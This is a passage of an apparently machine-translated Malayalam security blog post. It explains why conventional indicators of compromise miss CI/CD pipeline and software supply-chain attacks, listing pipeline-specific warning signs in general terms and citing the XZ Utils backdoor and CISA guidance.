ഇവ ട്രാക്ക് ചെയ്യപ്പെടുന്ന അറിയപ്പെടുന്ന സൂചകങ്ങളാണ് മിറ്റർ എടിടി&സികെ ഫ്രെയിംവർക്ക്, ഇത് എതിരാളികളുടെ പൊതുവായ പെരുമാറ്റങ്ങളെയും തന്ത്രങ്ങളെയും മാപ്പ് ചെയ്യുന്നു. ഇവ ഉപയോഗപ്രദമായ സിഗ്നലുകളാണ്. എന്നിരുന്നാലും, അവ പ്രധാനമായും ഓപ്പറേറ്റിംഗ് സിസ്റ്റങ്ങൾക്കോ കോർപ്പറേറ്റ് നെറ്റ്വർക്കുകൾക്കോ ബാധകമാണ്. തൽഫലമായി, സോഫ്റ്റ്വെയർ വിതരണ ശൃംഖലയിൽ നേരത്തെ സംഭവിക്കുന്ന സൂക്ഷ്മമായ കൃത്രിമത്വം അവർക്ക് നഷ്ടമാകുന്നു.
എന്തുകൊണ്ട് CI/CD Pipelineവ്യത്യസ്തമാണ്
CI/CD pipelineഡെവലപ്പർമാർ ഉപയോഗിക്കുന്ന ഓട്ടോമേറ്റഡ് പരിതസ്ഥിതികളാണ് s. commit കോഡ്, പുൾ ഡിപൻഡൻസികൾ, റിലീസ് ബിൽഡുകൾ. ഓരോ വിന്യാസത്തിലും ഇവിടെ ഒരു വിട്ടുവീഴ്ച സംഭവിക്കുമെന്ന് ആക്രമണകാരികൾക്ക് അറിയാം. അതനുസരിച്ച്, വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ എന്തൊക്കെയാണ് CI/CD pipelineഅല്ലേ? അവ വളരെ വ്യത്യസ്തമായി കാണപ്പെടുന്നു:
- package.json അല്ലെങ്കിൽ requirements.txt-ലേക്ക് ഒരു ക്ഷുദ്രകരമായ ആശ്രിതത്വം നിശബ്ദമായി ചേർത്തു.
- Git-ൽ പ്രദർശിപ്പിച്ചിരിക്കുന്ന API കീകൾ അല്ലെങ്കിൽ ടോക്കണുകൾ commits അല്ലെങ്കിൽ .env ഫയലുകൾ.
- npm അല്ലെങ്കിൽ PyPI പാക്കേജുകളിലേക്ക് അവ്യക്തമായ കോഡ് കുത്തിവച്ചിരിക്കുന്നു.
- പ്രിവിലേജ്ഡ്: ട്രൂ പോലുള്ള സുരക്ഷിതമല്ലാത്ത ഡിഫോൾട്ടുകളുള്ള ടെറാഫോം അല്ലെങ്കിൽ കുബേർനെറ്റസ് ഫയലുകൾ.
- Pipeline ഡാറ്റ പുറന്തള്ളുന്നതിനോ ബാക്ക്ഡോറുകൾ തുറക്കുന്നതിനോ എഡിറ്റ് ചെയ്ത ജോലികൾ.
ഈ വിട്ടുവീഴ്ച സൂചനകൾ CI/CD അദൃശ്യനായി തുടരുക standard സുരക്ഷാ ഉപകരണങ്ങൾ.
ഐഒസി സൈബർ സുരക്ഷയിലെ വിടവ്
പല ടീമുകളും വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങളുടെ മൂല്യം മനസ്സിലാക്കുന്നുണ്ടെങ്കിലും, അവർ ഇപ്പോഴും സെർവറുകളിൽ നിന്നും നെറ്റ്വർക്ക് ലോഗുകളിൽ നിന്നുമുള്ള കണ്ടെത്തലിനെ മാത്രമേ ആശ്രയിക്കുന്നുള്ളൂ. അതിനാൽ, ആക്രമണകാരികൾക്ക് സാധാരണ സൂചനകൾ അവശേഷിപ്പിക്കാതെ ബിൽഡുകൾ വിഷലിപ്തമാക്കാനോ മാൽവെയർ ചേർക്കാനോ കഴിയും. അതുകൊണ്ടാണ് XZ യൂട്ടിലിസ് ബാക്ക്ഡോർ അല്ലെങ്കിൽ മാലിഷ്യസ് എൻപിഎം പാക്കേജുകൾ പോലുള്ള സംഭവങ്ങൾ ഉൽപാദനത്തിലെത്തുന്നതുവരെ കണ്ടെത്താതെ പോയത്.
ഇത്തരത്തിലുള്ള വിതരണ ശൃംഖലയിലെ വിട്ടുവീഴ്ചകൾ ഇവയും എടുത്തുകാണിക്കുന്നു CISഎ യുടെ സപ്ലൈ ചെയിൻ സുരക്ഷാ മാർഗ്ഗനിർദ്ദേശം, ആക്രമണകാരികൾ കൂടുതലായി ലക്ഷ്യമിടുന്നതായി മുന്നറിയിപ്പ് നൽകുന്നു CI/CD pipelineകളും രജിസ്ട്രികളും.
എസ്
പരമ്പരാഗത IOC സൈബർ സുരക്ഷ ആവശ്യമാണ്, പക്ഷേ പര്യാപ്തമല്ല. എല്ലാറ്റിനുമുപരി, ടീമുകൾ പ്രത്യേക വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ തിരിച്ചറിയണം CI/CD pipelines. അപ്പോൾ മാത്രമേ അവർക്ക് ക്ഷുദ്ര കോഡ് കണ്ടെത്താൻ കഴിയൂ അല്ലെങ്കിൽ pipeline ദുരുപയോഗം പരിസ്ഥിതിയിലേക്ക് വ്യാപിക്കുന്നതിന് മുമ്പ്.







